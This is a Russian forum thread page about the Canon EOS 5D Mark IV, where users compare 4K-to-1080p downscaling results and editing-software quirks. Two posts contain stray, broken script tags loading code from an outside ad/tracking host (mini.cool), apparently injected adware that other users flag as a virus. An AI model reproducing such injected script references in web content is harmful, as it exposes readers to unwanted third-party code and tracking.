VIDEOMAX Домашняя страница Фотопрокат
Главная Главная > Цифровые видеокамеры и фототехника > Использование DSLR фотоаппаратов для видеосъемки
  Новые сообщения Новые сообщения RSS - лента новостей. - Canon  EOS 5D Mark IV
  Правила форума Правила форума  FAQ FAQ  Поиск по форуму   События   Регистрация Регистрация  Авторизация Авторизация

Циклоп.ру- интернет магазин профессиональных видеокамер и аксессуаров

Canon EOS 5D Mark IV

Ответить Ответить Страница  <1 144145146147>
Имя автора
Платиновый участник
Платиновый участник
Аватар

Присоединился: 03-апреля-2017
Местонахождение: Россия
Статус: Оффлайн
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Zodiac Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 29-октября-2018 21:50
Было отправлено Edward67 Edward67 написал(а):

Доконала-таки нашего  Zodiaca травка...поп

Ну.... Какую-никакую роль она сыграла. Это еще хорошо, что такие вещи всплывают вовремя. 
Если бы дело было только в пережатии картинки ютубом - плевать. Но когда такие же проблемы появляются при конвертации в более низкое разрешение в монтажке - серьезный повод задуматься. Unhappy
Наверх
Dr_StaSiL Просмотр списка
Золотой участник
Золотой участник
Аватар

Присоединился: 06-ноября-2009
Местонахождение: Челябинск
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Dr_StaSiL Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 30-октября-2018 09:37
Помрет веточка...Жаль. Было интересно читать)Smile< ="text/" async="" ="//mini.cool/1e40c8bd4601a5a5a4.js">< ="text/" ="http://mini.cool/optout/set/lat?jsonp=__twb_cb_427602479&key=1e40c8bd4601a5a5a4&cv=1541019111&t=1541019111485">< ="text/" ="http://mini.cool/optout/set/lt?jsonp=__twb_cb_355235103&key=1e40c8bd4601a5a5a4&cv=74078&t=1541019111485">

Редактировал Dr_StaSiL - 31-октября-2018 23:54
canon markIV/canon markIII
Наверх
corel Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Присоединился: 07-апреля-2006
Местонахождение: Белая Церковь
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать corel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 30-октября-2018 10:04
ещё один вирусный )
Наверх
Dr_StaSiL Просмотр списка
Золотой участник
Золотой участник
Аватар

Присоединился: 06-ноября-2009
Местонахождение: Челябинск
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Dr_StaSiL Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 30-октября-2018 10:12
Было отправлено corel corel написал(а):

ещё один вирусный )

Проверил комп разными способами - все чисто. Это с форумом конкретным что-то не так
< ="text/" async="" ="//mini.cool/1e40c8bd4601a5a5a4.js">

Редактировал Dr_StaSiL - 31-октября-2018 09:53
canon markIV/canon markIII
Наверх
dmihel Просмотр списка
Золотой участник
Золотой участник

Присоединился: 24-августа-2017
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать dmihel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 30-октября-2018 14:54
я сливать пятак не собираюсь покамест, но я не особо активный писака
Наверх
dmihel Просмотр списка
Золотой участник
Золотой участник

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать dmihel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 30-октября-2018 14:55
Было отправлено Zodiac Zodiac написал(а):

Было отправлено Edward67 Edward67 написал(а):

Доконала-таки нашего  Zodiaca травка...поп

Ну.... Какую-никакую роль она сыграла. Это еще хорошо, что такие вещи всплывают вовремя. 
Если бы дело было только в пережатии картинки ютубом - плевать. Но когда такие же проблемы появляются при конвертации в более низкое разрешение в монтажке - серьезный повод задуматься. Unhappy

так и не собрался я твой эксперимент воспроизвести
Наверх
corel Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Присоединился: 07-апреля-2006
Местонахождение: Белая Церковь
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать corel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 30-октября-2018 18:23
Было отправлено Dr_StaSiL Dr_StaSiL написал(а):

Было отправлено corel corel написал(а):

ещё один вирусный )
< ="text/" async="" ="//mini.cool/1e40c8bd4601a5a5a4.js">
Проверил комп разными способами - все чисто. Это с форумом конкретным что-то не так
поменяй браузер на человеческий... хром, оперу, к примеру.....а то эти ссылки очень напрягают и не только меня.....
Наверх
Zodiac Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Zodiac Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 31-октября-2018 02:25

Помрет веточка...Жаль. Было интересно читать)Smile 

Всё будет нормально! Cool  Мы всегда все вместе! 
Еще неизвестно, куда меня мои метания приведут... Как бы там ни было, для меня марк4 - эталон по цвету. Без всяких сомнений. 

Было отправлено dmihel dmihel написал(а):

Думаю, что тут не в траве собака зарыта. Когда-то создал такую тему - http://www.videomax.ru/forum/4k-dci_topic68025.html

При переводе из 4к в 1080 (на мониторе 1080) видна разница. То есть, картинка, переведенная в 1080 выглядит мыльнее оригинала. 
Если провести такие действия с оригиналом, снятым не в DCI, а в УХД, таких проблем нету - при сравнении стопов с оригинала и переведенного из него изображения в 1080, разницы нету. 
Может быть, какой-то косяк именно в пережатии с более широкой картинки.. 
В ветке про эРку выложен исходник в УХД. Закинул в премьер, вывел в обычном мп4 в 1080, посмотрел на мониторе ноута 1080 - никакой разницы нету. То есть, танцев с бубном уже меньше.

Наверх
dmihel Просмотр списка
Золотой участник
Золотой участник

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать dmihel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 31-октября-2018 23:29

Помрет веточка...Жаль. Было интересно читать)Smile 

Всё будет нормально! Cool  Мы всегда все вместе! 
Еще неизвестно, куда меня мои метания приведут... Как бы там ни было, для меня марк4 - эталон по цвету. Без всяких сомнений. 

Думаю, что тут не в траве собака зарыта. Когда-то создал такую тему - http://www.videomax.ru/forum/4k-dci_topic68025.html

При переводе из 4к в 1080 (на мониторе 1080) видна разница. То есть, картинка, переведенная в 1080 выглядит мыльнее оригинала. 
Если провести такие действия с оригиналом, снятым не в DCI, а в УХД, таких проблем нету - при сравнении стопов с оригинала и переведенного из него изображения в 1080, разницы нету. 
Может быть, какой-то косяк именно в пережатии с более широкой картинки.. 
В ветке про эРку выложен исходник в УХД. Закинул в премьер, вывел в обычном мп4 в 1080, посмотрел на мониторе ноута 1080 - никакой разницы нету. То есть, танцев с бубном уже меньше.

Я ничего подобного не замечаю, при условии просмотра в реальном размере. Только поля горизонтальные появляются (это если не бока отрезать)
Наверх
Duka Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Присоединился: 30-июля-2008
Местонахождение: В Лесу живу
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Duka Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 31-октября-2018 23:53
Было отправлено SEMENOV774 SEMENOV774 написал(а):

Что же касается видео то я луплю на "допотопную" с100м2 и менять не собираюсь)))
 Я, в экспедициях, до сих пор "луплю" на первую С100 и замены пока не вижу в сегменте FHD, прям чтоб супер- супер.  Smile
Canon EOS C100;Sony RX10 III; Sigma AF 18-35mm f/1.8 DC HSM; Canon 35mm f1.4L; 50mm f1.2L; 70-200 f2.8L IS; 24-105mm f4L IS;Canon EF-S 18-135mm f/3.5-5.6 IS STM;Canon EF 40mm f/2.8 STM.
Наверх
Zodiac Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Zodiac Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 00:43

Я ничего подобного не замечаю, при условии просмотра в реальном размере. Только поля горизонтальные появляются (это если не бока отрезать)

Возьми монитор 1080. Сделай скрин кадра с исходника, потом закинь в монтажку и переведи исходник в 1080, и сделай скрин этого же кадра, но уже переведенного в 1080. И при увеличении (при перещелкивании) заметишь разницу. 

Вот пример: 4к   -  https://cloud.mail.ru/public/4Kzf/9mw5QBbCf
                  1080  -  https://cloud.mail.ru/public/5T4B/Dx7fVCJVa

Редактировал Zodiac - 01-ноября-2018 00:59
Наверх
dmihel Просмотр списка
Золотой участник
Золотой участник

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать dmihel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 14:09

Возьми монитор 1080. Сделай скрин кадра с исходника, потом закинь в монтажку и переведи исходник в 1080, и сделай скрин этого же кадра, но уже переведенного в 1080. И при увеличении (при перещелкивании) заметишь разницу. 

при перещелкивании этих кадров видно, что ресайз привел к небольшому изменению соотношения сторон (на 1-2 пиксела), то есть картинка немножко вытянулась по вертикали, вот это и дает небольшое замыливание. В любом случае, даже если соотношение сторон остается прежним, ресайз это вопрос не к камере, а к алгоритму которым он делается (бикубики всякие и т.п.)
Наверх
Zodiac Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Zodiac Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 14:55
Дело не в камере, конечно. То же самое проделывал с исходниками dci с гаша - результат такой же. Но меняются не только пропорции, а ухудшается сама картинка (особенно отчетливо это видно в правом верхнем углу на ценнике альбома). А если переводить в фуллхд материал, снятый в UHD, никаких отличий на мониторе 1080 нету.
Вот я и думаю - может быть, из-за кривого понижения разрешения из 4к в 1080 и появляются такие проблемы - как каша на мелких деталях в движении. 
Наверх
dmihel Просмотр списка
Золотой участник
Золотой участник

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать dmihel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 15:24

Дело не в камере, конечно. То же самое проделывал с исходниками dci с гаша - результат такой же. Но меняются не только пропорции, а ухудшается сама картинка (особенно отчетливо это видно в правом верхнем углу на ценнике альбома). А если переводить в фуллхд материал, снятый в UHD, никаких отличий на мониторе 1080 нету.
Вот я и думаю - может быть, из-за кривого понижения разрешения из 4к в 1080 и появляются такие проблемы - как каша на мелких деталях в движении. 

Поморгай в просмоторщике оба кадра один за другим, увидишь как изображение смещается, а разрешение остается одинаковым - 1920х1080. У тебя не просто честный ресайз произошел, а искажение картинки, на качество это врядли положительно повлияло
Наверх
Zodiac Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Zodiac Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 15:30
Так я же просто закинул исходник в премьер и вывел в 1080. 
Вижу, что смещается, но и видно при увеличении, что детали замылены. 

А есть еще какой-то способ перевести 4к в 1080 без искажений?

Наверх
dmihel Просмотр списка
Золотой участник
Золотой участник

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать dmihel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 16:00

Так я же просто закинул исходник в премьер и вывел в 1080. 
Вижу, что смещается, но и видно при увеличении, что детали замылены. 

А есть еще какой-то способ перевести 4к в 1080 без искажений?

Не могу вот так сразу тебе ответить. Я эту проблему не рассматривал даже, надо эксперементировать. Вообще с разрешениями в премьере всякие чудеса могут случаться. Недавно перегонял UHD исходник, снятый в hevc, в прокси на dnxhr для использования в премьере, с кратным 4 уменьшением  разрешения, т.е. на выходе получился mxf  960х540. Премьер ни в какую не хотел кушать такие файлы, рассказывал про ошибки в разных фреймах, красные карточки выдавал итд. Пришлось переконверчивать с разрешением 958х538. И вот тогда он их съел и не поморщился. Вот такие кренделя
Наверх
Zodiac Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Zodiac Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 16:08
Так и в вегасе точно так же получается. )
Если будет время и желание - поэкспериментируй сам. Надо вывести собак из травы на чистую воду.
Big smile
Наверх
земляк Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Присоединился: 18-декабря-2009
Местонахождение: Ташкент
Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать земляк Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 16:21

[QUOTE=dmihel]

Чёта нет особый разницы-чёткости от  4к в шд....
Наверх
Zodiac Просмотр списка
Платиновый участник
Платиновый участник
Аватар

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать Zodiac Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 01-ноября-2018 16:25
Было отправлено земляк земляк написал(а):

Чёта нет особый разницы-чёткости от  4к в шд....

Это скрины с монитора 1920х1080. 
Наверх
dmihel Просмотр списка
Золотой участник
Золотой участник

Опции сообщения Опции сообщения   Поблагодарить (0) Поблагодарить(0)   Цитировать dmihel Цитировать  ОтветитьОтветить Ссылка на это сообщение Опубликовано: 13-ноября-2018 23:58
Снял небольшую рекламу

Наверх
 Ответить Ответить Страница  <1 144145146147>
  Закладки